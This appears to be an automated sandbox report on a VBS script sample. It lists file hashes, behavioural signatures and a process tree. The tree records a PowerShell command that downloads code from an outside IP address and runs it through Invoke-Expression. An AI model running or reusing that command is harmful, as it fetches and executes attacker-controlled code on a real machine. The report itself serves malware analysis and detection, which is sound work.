Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
10-04-2024 01:25
Static task
static1
Behavioral task
behavioral1
Sample
2e34908f60502ead6ad08af1554c305b88741d09e36b2c24d85fd9bac4a11d2f.vbs
Resource
win7-20240221-en
windows7-x64
4 signatures
150 seconds
General
-
Target
2e34908f60502ead6ad08af1554c305b88741d09e36b2c24d85fd9bac4a11d2f.vbs
-
Size
880KB
-
MD5
e0217823f2f748254b43ede64e422199
-
SHA1
3bede6ac6d6e7362b64a7de6663c9b6caac29832
-
SHA256
2e34908f60502ead6ad08af1554c305b88741d09e36b2c24d85fd9bac4a11d2f
-
SHA512
ab681712155c36cf0a8f44be5c181e4d4a2b61f3b35b2d6fa1266924b9932d8bab50b9e72a60d7e64ed3fa0504ec98726d81a2ebabf6bf403ac14dc5fb07c7b6
-
SSDEEP
24576:j2rHDMzlpSUY+g3Gy1U6dxvJwdd+2fk6T/dhTYzmQGeKsKBGrlrH:kAW59gs/s0dH
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2368 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2368 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2756 wrote to memory of 2368 2756 WScript.exe 28 PID 2756 wrote to memory of 2368 2756 WScript.exe 28 PID 2756 wrote to memory of 2368 2756 WScript.exe 28
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2e34908f60502ead6ad08af1554c305b88741d09e36b2c24d85fd9bac4a11d2f.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri '103.124.106.237/wctaehcw')2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2368
-